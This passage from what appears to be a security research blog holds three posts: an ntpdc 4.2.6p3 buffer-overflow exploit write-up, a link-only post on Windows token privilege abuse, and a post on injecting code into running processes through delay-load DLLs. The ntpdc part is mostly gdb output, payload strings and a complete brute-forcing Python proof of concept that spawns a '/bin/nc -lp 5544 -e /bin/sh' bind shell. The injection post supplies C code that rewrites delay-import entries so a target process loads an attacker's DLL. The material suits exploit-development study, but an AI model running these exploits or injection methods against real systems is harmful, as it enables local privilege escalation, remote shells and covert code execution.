gdb-peda$ x/wx 0x806a9cd+0x14
0x806a9e1:  0x6c61636f
gdb-peda$ x/wx 0x806a9cd+0x318
0x806ace5:  0x41414141

After figuring out the offset in the payload for ESI, we just need to plug 0x806a9cd in and hopefully we’ll have EIP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ python -c 'print "A"*485 + "C"*4 + "A"*79 + "\xcd\xa9\x06\x08" + "C"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
$ r < crash.info

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0x43434343 ('CCCC')
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x43434343 ('CCCC')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3d0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3d4 --> 0x0 
0012| 0xbffff3d8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3dc --> 0x0 
0020| 0xbffff3e0 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff3e4 --> 0x807b6f8 ('A' <repeats 200 times>...)
0028| 0xbffff3e8 --> 0x807d3b0 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x43434343 in ?? ()

Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:

1
2
3
4
5
6
gdb-peda$ searchmem 0x43434343
Searching for '0x43434343' in: None ranges
Found 755 results, display max 256 items:
 ntpdc : 0x806ace5 ("CCCC", 'A' <repeats 79 times>, "Ν©\006\b", 'C' <repeats 113 times>...)
 ntpdc : 0x806ad3c ('C' <repeats 200 times>...)
 [snip]

And we’ll fill it with \xcc to ensure we’re there (theoretically triggering NX):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\xcc"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < crash.info 
[snip]
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0xcccccccc 
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x806ad3d --> 0xcccccccc
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x806ad38:   int    0xa9
   0x806ad3a:   push   es
   0x806ad3b:   or     ah,cl
=> 0x806ad3d:   int3   
   0x806ad3e:   int3   
   0x806ad3f:   int3   
   0x806ad40:   int3   
   0x806ad41:   int3
[------------------------------------stack-------------------------------------]
0000| 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3f0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3f4 --> 0x0 
0012| 0xbffff3f8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3fc --> 0x0 
0020| 0xbffff400 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff404 --> 0x807b9d0 ('A' <repeats 200 times>...)
0028| 0xbffff408 --> 0x807d688 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0806ad3d in ?? ()
gdb-peda$ 

Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier, NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPU’s to access physical page tables and doubling each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single β€˜dont execute’ bit to the page table. You can read more about PAE here, and the original NX patch here.

This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.

Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file 
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<οΏ½AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAΝ©οΏ½οΏ½οΏ½οΏ½hοΏ½οΏ½οΏ½οΏ½hpοΏ½Θ·h0οΏ½Ι·οΏ½' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional

This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had to verify this is a common distribution method. An Ubuntu VM said otherwise:

1
2
3
4
5
6
7
$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2

Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.

Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest option is likely going to be an ADD ESP, ? gadget. The problem with this being that we need to have some sort of control over the stack or be able to modify ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.

After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:

1
2
3
4
5
6
7
8
9
10
11
12
gdb-peda$ x/6i 0x800143e0
   0x800143e0: add    esp,0x256c
   0x800143e6: pop    ebx
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
   0x800143ea: ret 
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4:  "-1420310755.557158-104120677"
0xbffff3c1:  "WINDOWID=69206020"
0xbffff3d3:  "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd:  "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"

These are environmental variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:

1
2
3
4
5
6
7
8
9
$ export LD_PRELOAD=`python -c 'print "A"*10000'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[..snip..]
gdb-peda$ x/10wx $esp+0x256c
0xbfffedc8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffedd8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffede8: 0x41414141  0x41414141
gdb-peda$ 

Using some pattern_create/offset magic, we can find the offset in our LD_PRELOAD string and take control over EIP and the stack:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ export LD_PRELOAD=`python -c 'print "A"*8490 + "AAAA" + "BBBB"'`
$ python -c "print 'A'*485 + '\xe0\x43\x01\x80' + 'A'*79 + '\x8d\x67\x02\x80' + 'B'*600" > input.file
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x13560 
EDX: 0x42424242 ('BBBB')
ESI: 0x41414141 ('AAAA')
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff3bc ("BBBB")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xbffff3bc ("BBBB")
0004| 0xbffff3c0 --> 0x4e495700 ('')
0008| 0xbffff3c4 ("DOWID=69206020")
0012| 0xbffff3c8 ("D=69206020")
0016| 0xbffff3cc ("206020")
0020| 0xbffff3d0 --> 0x47003032 ('20')
0024| 0xbffff3d4 ("NOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
0028| 0xbffff3d8 ("_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.

From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor null bytes all of them:

1
2
3
4
5
6
7
8
gdb-peda$ vmmap

0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$ 

One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:

1
2
0x800138f2: add edi, esi; ret 0;
0x80022073: call edi

Using the above, we could pop controlled, non-null values into EDI/ESI, that when added equaled 0x366060 <system>. Many values will work, but I chose 0xeeffffff + 0x11366061:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x12f00 
EDX: 0x42424242 ('BBBB')
ESI: 0xeeffffff 
EDI: 0x11366061 
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
EIP: 0x800143ea (ret)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
=> 0x800143ea: ret    
   0x800143eb: nop
   0x800143ec: lea    esi,[esi+eiz*1+0x0]
   0x800143f0: mov    DWORD PTR [esp],ebp
   0x800143f3: call   0x80018d20
[------------------------------------stack-------------------------------------]
0000| 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
0004| 0xbfffefbc --> 0x80022073 --> 0xd7ff 
0008| 0xbfffefc0 ('C' <repeats 200 times>...)
0012| 0xbfffefc4 ('C' <repeats 200 times>...)
0016| 0xbfffefc8 ('C' <repeats 200 times>...)
0020| 0xbfffefcc ('C' <repeats 200 times>...)
0024| 0xbfffefd0 ('C' <repeats 200 times>...)
0028| 0xbfffefd4 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x800143ea in ?? ()

As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:

1
2
3
4
5
6
7
EDI: 0x366060 (<system>:   sub    esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call   edi

Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.

This culminates in:

1
2
3
4
5
6
7
8
9
10
$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional

Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.

Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII Armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485        # junk 
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79        # junk 
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):

    for inc in xrange(200):

        ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
        ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)

        environ["LD_PRELOAD"] = ld_pl
        system("echo %s | ntpdc 2>&1" % sploit)

Abusing Token Privileges for EoP

1 September 2017 at 21:00

This is just a placeholder post to link off to Stephen Breen and I’s paper on abusing token privileges. You can read the entire paper here[0]. I also recommend checking out the blogpost he posted on Foxglove here[1].

[0] https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt
[1] https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

Abusing delay load DLLs for remote code injection

19 September 2017 at 21:00

I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motiviation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below:

This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

1
2
3
4
5
6
7
8
9
10
11
struct InternalImgDelayDescr {
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
    };

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)          
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES

[...] 

   68A80 [      40] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
    1000 [     D98] address [size] of Import Address Table Directory
   AC670 [     140] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory

The first entry and it’s delay linked DLL can be seen in the following:

1
2
3
4
5
0:022> dd 00690000+ac670 l8
0073c670  00000001 000ac7b0 000b24d8 000b1000
0073c680  000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0 
0073c7b0  "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.

The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry:

1
2
3
0:022> dps 00690000+000b1000 l2
00741000  006dd0ac explorer!_imp_load__PlaySoundW
00741004  00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

1
2
3
4
5
6
7
8
9
10
0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push    ecx
006dd0b4 52              push    edx
006dd0b5 50              push    eax
006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
0:000> dps 00060000+0001839c l2
0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0  00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0 
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable:

1
2
3
4
0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another additional twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

1
2
3
4
5
6
7
00741044  00726afa explorer!_imp_load__UnInitProcessPriv
00741048  7467f845 DUI70!InitThread
0074104c  00726b0f explorer!_imp_load__UnInitThread
00741050  74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check it’s entry to determine if a handle to it can be used:

1
2
3
4
5
6
7
8
HMODULE hmod = *idd.phmod;
    if (hmod == 0) {
        if (__pfnDliNotifyHook2) {
            hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
            }
        if (hmod == 0) {
            hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
            }

The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary irregardless of this value; this can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported function of the portable executable, and exists today on modern systems.

Another limitation is that, because at it’s core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio.

With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + 
            pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries 
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

1
2
3
4
5
IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and it’s directories, and locate the appropriate delay entry we’re targeting.

This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

